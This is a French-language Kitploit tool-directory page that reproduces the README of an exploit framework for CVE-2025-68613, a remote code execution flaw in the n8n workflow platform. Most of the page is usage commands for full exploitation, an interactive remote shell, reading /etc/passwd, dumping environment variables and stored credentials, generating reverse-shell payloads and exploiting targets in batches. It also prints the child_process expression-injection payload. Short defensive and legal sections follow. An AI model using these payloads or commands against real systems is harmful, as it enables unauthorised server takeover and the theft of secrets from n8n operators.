Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate — n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows | Kitploit
Outils/GitHubGitHub/hackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate
Scanners de VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsPost-ExploitationTests d'IntrusionCommandement et ContrôleApprentissage et ÉducationRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Outil d'Accès à Distance
Développement de Charges Utiles
GitHubhackersatyamrastogi/n8n-exploit-cve-2025-68613-n8n-god-mode-ultimate

n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

n8n God Mode Ultimate - CVE-2025-68613 Scanner v1.0.0 ║ ║ Exécution de code à distance dans l'automatisation de workflows

Voir le dépôt
53il y a 7 moisPas encore vérifié

n8n God Mode Ultimate - CVE-2025-68613 Scanner & Framework d'exploitation

n8n God Mode Ultimate

Outil avancé de scan RCE et d'exploitation pour n8n Workflow Automation

Python Version License CVE CVSS Score


🎯 Aperçu

n8n God Mode Ultimate est un framework complet de tests de sécurité conçu pour détecter et valider CVE-2025-68613 sur les plateformes d'automatisation de workflows n8n. Cette vulnérabilité critique d'exécution de code à distance (RCE) affecte les versions de n8n via une injection d'expression dans les contextes d'exécution des workflows.

Détails de CVE-2025-68613

  • Score CVSS : 10.0 (Critique)
  • Vecteur d'attaque : Réseau
  • Complexité de l'attaque : Faible
  • Privilèges requis : Faibles (identifiants valides)
  • Interaction utilisateur : Aucune
  • Type de vulnérabilité : Injection d'expression → Exécution de code à distance

Versions concernées :

  • n8n >= 0.211.0 et < 1.120.4
  • n8n >= 1.121.0 et < 1.121.1

Versions corrigées :

  • n8n >= 1.120.4
  • n8n >= 1.121.1
  • n8n >= 1.122.0

✨ Fonctionnalités

🔍 Détection & Scan

  • Détection intelligente de version - Extraire la version de n8n depuis les métadonnées de la page de connexion
  • Scan par lots - Scan concurrent multi-threadé avec suivi de progression
  • Plusieurs modes de scan :
    • --detect - Détection de version uniquement (le plus rapide, non intrusif)
    • --safe - Vérification sécurisée de la vulnérabilité sans exploitation
    • --poc - Validation de preuve de concept RCE
    • --exploit - Mode exploitation complète

💣 Capacités d'exploitation

  • 4 techniques d'exploitation :
    1. Déclencheur planifié - Workflow à exécution automatique (le plus fiable)
    2. Déclencheur Webhook - Exécution déclenchée par HTTP
    3. Nœud de code - Accès direct à child_process
    4. Injection d'expression - Exécution manuelle d'expressions

🎮 Fonctionnalités God Mode

  • Shell interactif - Shell distant complet avec historique des commandes
  • Opérations sur fichiers :
    • read <fichier> - Lire des fichiers distants
    • write <fichier> <contenu> - Écrire des fichiers sur la cible
  • Extraction d'environnement - Vider toutes les variables d'environnement
  • Informations système - Détails OS, configuration réseau, infos processus
  • Reverse Shell - Génération optionnelle de payload reverse shell
  • Historique des commandes - Suivi intégré de l'historique

📊 Capacités avancées

  • Énumération des identifiants - Extraire les identifiants stockés via l'API
  • Dump de workflows - Exporter tous les workflows avec métadonnées
  • Extraction de configuration - Dump complet de la configuration système
  • Énumération des utilisateurs - Lister tous les utilisateurs n8n
  • Analyse des journaux d'exécution - Analyser les sorties de commandes des exécutions de workflows
  • Nettoyage automatique - Suppression facultative des workflows après exécution

🚀 Installation

Prérequis

root@kitploit:~
# Python 3.8 ou supérieur
python3 --version

# Gestionnaire de paquets pip
pip3 --version

Installer les dépendances

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/hackersatyamrastogi/n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate.git
cd n8n-exploit-CVE-2025-68613-n8n-God-Mode-Ultimate

# Installer les paquets requis
pip3 install -r requirements.txt

Prérequis

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0
tqdm>=4.66.0
colorama>=0.4.6

📖 Utilisation

Utilisation de base

root@kitploit:~
# Afficher le menu d'aide
python3 n8n-godmode-ultimate.py -h

# Détecter la version de n8n (non intrusif)
python3 n8n-godmode-ultimate.py -u http://cible:5678 --detect

# Vérification sécurisée de la vulnérabilité
python3 n8n-godmode-ultimate.py -u http://cible:5678 --safe -e [email protected] -p motdepasse

# Preuve de concept RCE
python3 n8n-godmode-ultimate.py -u http://cible:5678 --poc -e [email protected] -p motdepasse

# Exploitation complète
python3 n8n-godmode-ultimate.py -u http://cible:5678 --exploit -e [email protected] -p motdepasse

Opérations God Mode

root@kitploit:~
# Exécuter une seule commande
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --cmd "whoami"

# Lire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --read-file "/etc/passwd"

# Écrire un fichier distant
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --write-file "/tmp/test.txt" --content "payload"

# Extraire les variables d'environnement
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --dump-env

# Shell interactif
python3 n8n-godmode-ultimate.py --god -u http://cible:5678 \
  -e [email protected] -p motdepasse --shell

Scan par lots

root@kitploit:~
# Scanner plusieurs cibles depuis un fichier
python3 n8n-godmode-ultimate.py -l cibles.txt --detect -t 20

# Exploitation par lots
python3 n8n-godmode-ultimate.py -l cibles.txt --poc -e [email protected] -p motdepasse -t 10

Format de cibles.txt :

root@kitploit:~
http://cible1:5678
https://cible2.example.com
http://192.168.1.100:5678
https://n8n.example.org

Commandes du shell interactif

Une fois en mode shell (--shell) :

root@kitploit:~
n8n> whoami              # Exécuter une commande
n8n> read /etc/passwd    # Lire un fichier
n8n> env                 # Afficher les variables d'environnement
n8n> info                # Informations système
n8n> history             # Historique des commandes
n8n> exit                # Quitter le shell

🛠️ Options de ligne de commande

Options de cible

root@kitploit:~
-u, --url URL             URL cible n8n
-l, --list FILE           Fichier contenant les URL cibles
-t, --threads NUM         Nombre de threads pour le scan par lots (défaut : 10)

Authentification

root@kitploit:~
-e, --email EMAIL         Email utilisateur n8n
-p, --password PASS       Mot de passe utilisateur n8n

Modes de scan

root@kitploit:~
--detect                  Détection de version uniquement (le plus rapide)
--safe                    Vérification sécurisée sans exploitation
--poc                     Preuve de concept RCE
--exploit                 Mode exploitation complète

God Mode

root@kitploit:~
--god                     Activer le god mode
--cmd COMMAND             Exécuter une seule commande
--read-file PATH          Lire un fichier distant
--write-file PATH         Écrire un fichier distant
--content DATA            Contenu pour l'opération d'écriture
--dump-env                Extraire toutes les variables d'environnement
--shell                   Mode shell interactif
--revshell HOST:PORT      Payload reverse shell

Options d'exploitation

root@kitploit:~
--mode MODE               Mode d'exploitation : schedule|webhook|code|expression (défaut : schedule)
--timeout SEC             Délai d'attente de commande en secondes (défaut : 30)
--cleanup                 Supprimer les workflows après exécution
-k, --insecure           Désactiver la vérification SSL
-v, --verbose            Sortie détaillée
-q, --quiet              Sortie minimale

🔬 Détails techniques

Méthodologie d'exploitation

1. Déclencheur planifié (Recommandé)

Crée un workflow avec un déclencheur planifié qui s'exécute automatiquement toutes les 3 secondes. Méthode la plus fiable.

root@kitploit:~
Payload: {{(function(){
  return this.process.mainModule.require('child_process')
    .execSync('whoami').toString()
})()}}

2. Déclencheur Webhook

Crée un point de terminaison HTTP webhook qui exécute des commandes lorsqu'il est déclenché.

3. Nœud de code

Injecte du code directement dans un nœud de code avec accès à child_process.

4. Injection d'expression

Exécution manuelle via le système d'évaluation d'expressions de n8n.

Détection de version

Extrait la version de la configuration Sentry encodée en base64 sur la page de connexion :

root@kitploit:~
<meta name="n8n:config:sentry" content="eyJ2ZXJzaW9uIjoi..." />

Points de terminaison API utilisés

  • /rest/login - Authentification
  • /rest/workflows - Opérations CRUD sur les workflows
  • /rest/credentials - Énumération des identifiants
  • /rest/executions - Récupération des journaux d'exécution
  • /rest/users - Énumération des utilisateurs
  • /rest/settings - Configuration système

📊 Exemples de sortie

Détection de version

root@kitploit:~
[*] n8n God Mode Ultimate v1.0.0
[*] Cible : https://target.example.com
[✓] Version n8n : 1.36.1
[!] Statut : VULNÉRABLE (< 1.120.4)

Preuve de concept RCE

root@kitploit:~
[*] Authentification réussie
[*] Création du workflow d'exploitation...
[*] ID du workflow : hd6LxSY765WBThqd
[*] Exécution de la commande : whoami
[✓] Commande exécutée avec succès !
[+] Sortie : root

Shell interactif

root@kitploit:~
n8n> whoami
[+] root

n8n> read /etc/hostname
[+] n8n-production-server

n8n> env
[+] Variables d'environnement :
N8N_ENCRYPTION_KEY=a1b2c3d4e5f6...
DATABASE_HOST=postgres.internal
AWS_ACCESS_KEY_ID=AKIA...

🛡️ Mesures défensives

Actions immédiates

  1. Mettre à niveau vers une version corrigée (>= 1.120.4 ou >= 1.121.1)
  2. Désactiver les identifiants par défaut ([email protected]:admin)
  3. Mettre en place une authentification forte (MFA recommandée)
  4. Segmentation réseau - Restreindre l'accès à l'instance n8n
  5. Auditer les workflows - Examiner tous les workflows actifs
  6. Surveiller les journaux d'exécution - Vérifier les activités suspectes

Durcissement à long terme

  • Activer la journalisation des audits
  • Mettre en place une liste blanche IP
  • Utiliser l'authentification OAuth/SSO
  • Évaluations de sécurité régulières
  • Maintenir n8n à jour
  • Chiffrement des bases de données au repos
  • Stockage sécurisé des identifiants
  • Surveillance du trafic réseau

⚠️ Avertissement légal

POUR LES TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT

Cet outil est fourni à des fins éducatives et pour des tests de sécurité autorisés. Les utilisateurs doivent se conformer à toutes les lois et réglementations applicables.

⚖️ Exigences légales

VOUS DEVEZ :

  • ✅ Obtenir une autorisation écrite avant de tester
  • ✅ Utiliser uniquement sur des systèmes que vous possédez ou pour lesquels vous avez l'autorisation de tester
  • ✅ Respecter les pratiques de divulgation responsable
  • ✅ Suivre les lois et réglementations applicables
  • ✅ Utiliser à des fins de sécurité défensive

VOUS NE DEVEZ PAS :

  • ❌ Tester des systèmes sans autorisation explicite
  • ❌ Utiliser à des fins malveillantes
  • ❌ Effectuer des attaques par déni de service
  • ❌ Exfiltrer ou modifier des données sans autorisation
  • ❌ Déployer sur des systèmes de production sans consentement

📜 Responsabilité

L'auteur décline toute responsabilité en cas d'utilisation abusive de cet outil. L'accès non autorisé à des systèmes informatiques est illégal en vertu de :

  • Computer Fraud and Abuse Act (CFAA) - États-Unis
  • Computer Misuse Act - Royaume-Uni
  • Directive européenne sur la cybercriminalité
  • Législations similaires dans le monde

Utilisez à vos risques et périls. Vous êtes responsable de vos actions.


🤝 Contribution

Les contributions sont les bienvenues ! Veuillez suivre ces directives :

  1. Forkez le dépôt
  2. Créez une branche de fonctionnalité (git checkout -b feature/amelioration)
  3. Commitez vos modifications (git commit -am 'Ajouter une nouvelle fonctionnalité')
  4. Poussez vers la branche (git push origin feature/amelioration)
  5. Créez une Pull Request

Code de conduite

  • Suivez les pratiques de divulgation responsable
  • Documentez clairement les fonctionnalités de sécurité
  • Incluez une gestion d'erreurs appropriée
  • Ajoutez des commentaires pour la logique complexe
  • Testez minutieusement avant de soumettre

📚 Références

Informations CVE

  • CVE-2025-68613 - NVD
  • Avis de sécurité n8n

Documentation n8n

  • Documentation officielle n8n
  • Référence API n8n
  • Bonnes pratiques de sécurité n8n

Recherche en sécurité

  • Vulnérabilités d'injection d'expression
  • Sécurité de l'automatisation des workflows

👨‍💻 Auteur

Satyam Rastogi

  • GitHub : @hackersatyamrastogi
  • Site web : https://www.satyamrastogi.com
  • Twitter : @hackersatyamrastogi

📄 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

root@kitploit:~
MIT License

Copyright (c) 2025 Satyam Rastogi

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.

🌟 Remerciements

  • L'équipe n8n pour avoir construit une plateforme d'automatisation de workflows exceptionnelle
  • Les chercheurs en sécurité de la communauté n8n
  • Les outils de sécurité open source qui ont inspiré ce projet

📞 Support

Pour les problèmes de sécurité, veuillez signaler de manière responsable :

  • Problèmes de sécurité : Ouvrir un avis de sécurité privé
  • Rapports de bugs : Utiliser GitHub Issues
  • Demandes de fonctionnalités : Ouvrir une discussion GitHub

⭐ Starrez ce dépôt si vous l'avez trouvé utile !

Fabriqué avec 💻 par des chercheurs en sécurité, pour des chercheurs en sécurité

Télécharger l’outil